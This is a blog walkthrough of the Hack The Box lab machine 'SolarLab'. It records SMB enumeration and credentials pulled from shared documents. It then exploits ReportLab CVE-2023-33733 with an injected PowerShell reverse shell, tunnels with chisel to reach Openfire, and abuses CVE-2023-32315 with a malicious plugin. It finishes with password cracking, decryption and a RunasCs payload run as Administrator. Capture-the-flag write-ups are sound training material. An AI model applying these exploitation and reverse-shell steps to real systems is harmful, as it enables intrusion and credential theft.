Post

HTB - SolarLab

SolarLab - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

Posted Updated
By Trompie
3 min read

HTB - SolarLab

NMAP

image1

Add solarlab.htb and report.solarlab.htb to /etc/hosts

  • Enumerate port 445:
1
2

enum4linux -u Guest -p "" -a solarlab.htb

image2

  • Enum share:

image3

  • Download the content and look for metadata: ```bash
exiftool concepts/* old_leave_request_form.docx details-file.xlsxgrep “Modified” & exiftool concepts/* old_leave_request_form.docx details-file.xlsxgrep “Creator”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86

![image4](../resources/0cc386b1f81c46adbbaa78b7c6cc83ed.png)

- Opening the .docx file:

![image5](../resources/85b1fa037fe442ada28c34409ba15883.png)

| Alexander.knight@gmail.com | al;ksdhfewoiuh         |
|------------------------------------|------------------------|
| Kalexander                 | dkjafblkjadsfgl        |
| Alexander.knight@gmail.com | d398sadsknr390         |
| blake.byte                 | ThisCanB3typedeasily1@ |
| AlexanderK                 | danenacia9234n         |
| ClaudiaS                   | dadsfawe9dafkn         |


**<u>Enumerate port 6791:</u>**

- We get a login page:

![image6](../resources/ec8455b326bb4969af4a87dbf043c4f7.png)

- If we use **BlakeB** with the password **ThisCanB3typedeasily1@** , we can log in to report.solarlab.htb:6791

![image7](../resources/2b3eaa0fe1074152ae6dd5785e6800d5.png)

- All of these options are the same as below:

![image8](../resources/b756f09c75d5497988f04395ec9b8b12.png)


![image9](../resources/752fc97e7f024be8913038b21cb509ad.png)

- Generate a pdf
- Use exiftool to view the pdf:

![image10](../resources/11a4740779cd418c8fb7498cbfc9bc14.png)

- We can see that **ReportLab** is being used as the PDF Generator

- There is an exploit for ReportLab - **CVE-2023-33733**
<https://github.com/c53elyas/CVE-2023-33733>

**<u>Exploit steps:</u>**

- Open Burp
- Click on Leave Request
- Capture the request with Burp:

![image11](../resources/9cd7df414f6d4c2fa1401a48ccbcead1.png)

- What we need to **change** is the parameter **"leave_request"**

- On github there's a POC:
<https://github.com/c53elyas/CVE-2023-33733>

No need to git clone the repo

- If we scroll down to the bottom of the page:

![image12](../resources/b7017fdd553146abad33ba853b8364bb.png)

We can see the html code that needs to be injected in order to utilise the **os.system** command

- Now if we go over to revshells and get the powershell \#3 base64 code:

![image13](../resources/9cac1a668a864d2bbf8ade573e4ceadb.png)

- We can input that in the system() function instead


![image14](../resources/8408678b25644e31ac2d962e3e572846.png)

- Set up a listener
- Send the request

- And we get a shell as Blake:

![image15](../resources/d764af43f2f84da49edf1770cba4b934.png)


![image16](../resources/cec224e781f34f24b0df895804041936.png)

```bash
cat user.txt
  • In the current app directory - we get the instance dir, which contains a db file:

image17

alexanderk - HotP!fireguard’

claudias - 007poiuytrewq

blakeb - ThisCanB3typedeasily1@

  • We can see a lot of ports running locally:

image18

Upload chisel

  • On Kali:
1

./chisel server -p 8888 --reverse
  • On target:
1
2
3
4

.\chisel.exe client 10.10.14.69:8888 R:socks &

proxychains nmap 127.0.0.1 -sT

image19

  • OpenFire is running locally and Openfire admin console runs on port 9090:

image20

  • We get the Openfire version - 4.7.4 – Which leads us to CVE-2023-32315

CVE-2023-32315

This exploit can be done manually:

https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce

or

Using a script:

1
2

git clone https://github.com/miko550/CVE-2023-32315.git
  • Since we don’t have a valid user, do the following:
1
2
3
4

cd CVE-2023-32315
pip3 install -r requirements.txt
proxychains python3 CVE-2023-32315.py -t http://127.0.0.1:9090

image21

  • It created a user for us - by retrieving the csrf and jsessionid tokens and crafting a new user: username: lyy10y

password: llq47k

  • Login to the admin console with the new credentials

  • Go to the Plugins page
  • Upload the plugin (openfire-management-tool-plugin.jar ) found in the git repo

image22

  • Successfully uploaded and the password is 123

image23

  • Go to Server -> Server Settings -> Management Tool (If you take too long, you need to reupload the plugin)

image24

  • And we’re user Openfire:

image25

  • Using Powershell#3 from revshells and setting up a listener - we get a shell:

image26

image27

  • Upgrade to meterpreter:

image28

image29

1
2

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

image30

  • In C:\Program Files\Openfire - we get an embedded-db folder and this contains some interesting files

  • The openfire.script file is the “database” or more specifically it’s a file with all the sql commands

image31

  • In here we can see an encrypted password for Administrator and a passwordKey:

image32

  • Luckily there is a repo for this:

https://github.com/c0rdis/openfire_decrypt

  • Clone the repo

  • Build the file:

1
2

javac OpenFireDecryptPass.java
  • Enter the password and key:

image33

1
2

java OpenFireDecryptPass 'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442' 'hGXiFzsKaAeYLjn'

image34

We get: ThisPasswordShouldDo!@

  • Use RunasCs to run a msf payload:
1
2

.\runascs.exe administrator ThisPasswordShouldDo!@ ".\rev.exe"

image35

image36

CTF, HTB
hashcat linux nmap powershell privilege escalation python rce tryhackme hackthebox immersivelabs thm iml htb
This post is licensed under CC BY 4.0 by the author.